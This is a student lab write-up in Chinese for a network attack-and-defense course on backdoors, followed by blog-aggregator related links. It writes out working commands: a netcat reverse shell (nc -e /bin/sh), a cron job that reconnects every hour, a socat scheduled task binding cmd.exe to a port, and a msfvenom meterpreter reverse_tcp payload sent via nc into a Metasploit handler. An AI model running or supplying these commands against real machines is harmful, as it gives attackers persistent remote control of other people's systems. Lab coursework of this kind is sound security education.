20155235 《网络攻防》 实验二 后门原理与实践

实验目的

建立一个后门连接是如此的简单,功能又如此强大。通过亲手实践并了解这一事实,从而提高自己的安全意识 。

实验内容

(1)使用netcat获取主机操作Shell,cron启动

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

(5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?
优盘里带有有后门的文件,插到电脑上把文件移到电脑中。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
win:网页上的相关链接
Linux:实验中用到的ncat等
(3)Meterpreter有哪些给你映像深刻的功能?
画图
(4)如何发现自己有系统有没有被安装后门?
定时查看端口有无可疑的连接吧

实验一 NC 或 netcat

任务一 Windows获得Linux Shell

步骤1:在Windows系统使用ipconfig指令查看本机IP;使用ncat.exe程序监听本机的5235端口
步骤2:在Kali系统中使用nc指令的-e选项反向连接Windows主机的5235端口
步骤3:在Windows下成功运行Kali的shell,运行ls指令后,整体截图如下

任务二 Linux获得Windows Shell

实验过程中出现了一些小问题:

任务三使用nc传输数据

步骤1:在Windows下监听5235端口
步骤2:在Kali下连接到Windows的5235端口:
步骤3:建立之后进行文字传输,后面会用来传输后门

任务四使用netcat获取主机操作Shell

步骤1:在Windows系统下监听5235端口。
步骤2:在kali下用crontab -e指令编辑一条定时任务,选择编辑器时选择3 basic vim编辑器。
步骤3:在最后一行添加 15 * * * * /bin/netcat 169.254.1.140 5235 -e /bin/sh ,即在每个小时的第15分钟反向连接Windows主机的5235端口。

任务五使用socat获取主机操作Shell

步骤1:在Windows系统下,打开控制面板下搜索任务计划开始创建任务,填写任务名称后,新建一个触发器
步骤2:在操作->程序或脚本中选择socat.exe文件的路径,在添加参数一栏填写 tcp-listen:5235 exec:cmd.exe,pty,stderr ,这个命令的作用是把cmd.exe绑定到端口5235,同时把cmd.exe的stderr重定向到stdout上,创建好后,直接运行
步骤3:此时,在Kali环境下输入指令socat - tcp:192.168.1.104:5216,这里的第一个参数-代表标准的输入输出,使第二个流连接到Windows主机的5216端口,此时可以发现已经成功获得了一个cmd shell:

任务六使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

步骤1:输入指令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.43 LPORT=5235 -f exe > 20155235_backdoor.exe 生成后门程序。

步骤2:通过nc指令将生成的后门程序传送到Windows主机上。
在kali端使用命令: nc 192.168.43.43 5235 < 20155235_backdoor.exe 传送程序。
在windows端使用命令: ncat.exe -l 5235 > 20155235_backdoor.exe 接受程序。
步骤3:在Kali上使用 msfconsole 指令进入msf控制台,输入命令 use exploit/multi/handler 使用监听模块,使用命令 set payload windows/meterpreter/reverse_tcp 设置payload,设置反弹回连的IP(kali的IP)和端口:



目前我就卡在了这一步,按照教程,后面的那两条怎么也不出来,现在还没有解决办法

转载于:https://www.cnblogs.com/WYjingheng/p/8710999.html

#20155235 《网络攻防》 实验二 后门原理与实践相关推荐

  1. 《网络攻防》 免杀原理与实践

    20145224陈颢文 <网络攻防> 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 基于特征码: 基于行为: 启发式. 免杀是做什么? 避免恶意代码被杀毒软件扫描出来被删除, ...

  2. 20155317王新玮《网络对抗》Exp2 后门原理与实践

    20155317王新玮<网络对抗>Exp2 后门原理与实践 一.实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划 ...

  3. 20145209刘一阳《网络对抗》Exp2 后门原理与实践

    20145209刘一阳<网络对抗>Exp2 后门原理与实践 基础问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? •在网上下载软件的时候,后门很有可能被捆绑在下载的软件当中: ...

  4. 网络对抗 Exp2.1 后门原理与实践 20154311 王卓然

    Exp2后门原理与实践 一.实践目标与内容 学习内容:使用nc实现win,mac,Linux间的后门连接 :meterpreter的应用 :MSF POST 模块的应用 学习目标:建立一个后门连接是如 ...

  5. 20154319 《网络对抗技术》后门原理与实践

    一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分) 任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分) 任务三:使用MSF meterpr ...

  6. 20145235李涛《网络对抗》Exp2 后门原理与实践

    Windows获得Linux Shell Linux获得windows shell 实验内容 使用netcat获取主机操作shell,cron启动 使用socat获取主机shell,任务计划启动 使用 ...

  7. 2018-2019-2 20165234 《网络对抗技术》 Exp2 后门原理与实践

    实验二 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其 ...

  8. 2017-2018-2 20155228 《网络对抗技术》 实验二:后门原理与实践

    2017-2018-2 20155228 <网络对抗技术> 实验二:后门原理与实践 实验内容 使用netcat获取主机操作Shell,cron启动 (0.5分) 使用socat获取主机操作 ...

  9. 2018-2019-2 网络对抗技术 20165320 Exp2 后门原理与实践

    后门原理与实践 windows获取Linux操作Shell 获取本机的IP netcat介绍:一个进行基本的TCP.UDP数据收发的工具 相关的参数与具体用法 windows打开监听: ncat.ex ...

最新文章

  1. javascript加载顺序问题(二)
  2. CentOS 8安装JFrog Artifactory社区版解决方案
  3. Linux上安装wkhtmltopdf,以及调试所遇到的问题
  4. 安装mysql最后一步第二个打叉_Mysql安装到最后一步时。出现start service红叉   亲朋好友帮忙指导一下!谢谢! 百...
  5. 3534 helpmsg mysql net_MySQL出现NET HELPMSG 3534
  6. 从PHP脚本返回JSON
  7. Q129:PBRT-V3,均匀介质的采样(15.2.1章节)
  8. spring多线程获取不到bean_刚面完的字节跳动java研发面试题整理(含答案):线程+MySQL+Spring+JVM...
  9. 基于STM32的(NB-IOT(BC26))温湿度监测系统
  10. 手机版支付宝转账截图生成器Q574651623
  11. STM32入门学习 第二天
  12. 日语五段动词变形规则
  13. react报错解决 Rendered more fewer hooks than during the previous render
  14. leetcode-Algorithms-22|括号生成
  15. RK3308设置GPIO的方法
  16. Schrodinger 功能模块简介
  17. 什么是云平台,云平台主要能干什么?
  18. sso单点登录控件添加白名单教程(window Defender 和赛门铁克添加白名单)
  19. 关于英语学习过程的量化和英语PKM的设想
  20. EReg 1.0: SPSS中的扩展回归分析插件

热门文章

  1. 在批处理模式下使用mysql_3.5 在批处理模式下使用mysql
  2. 语法分析器 java实验报告_词法分析器实验报告.doc
  3. Java详解:作为一个码农终于把MySQL日记看懂了
  4. Java程序员校招蚂蚁金服,mysql培训考试
  5. 机器学习(MACHINE LEARNING)MATLAB求解利润最大化问题【线性规划】
  6. Keras【Deep Learning With Python】—Keras实现序贯模型
  7. 【题解】 HDU 2570 迷瘴
  8. Python-time标准库知识小结
  9. python生成斐波那契_python学习-生成器(generator)及斐波那契;yield
  10. 静态网页案例_手把手教你构建网页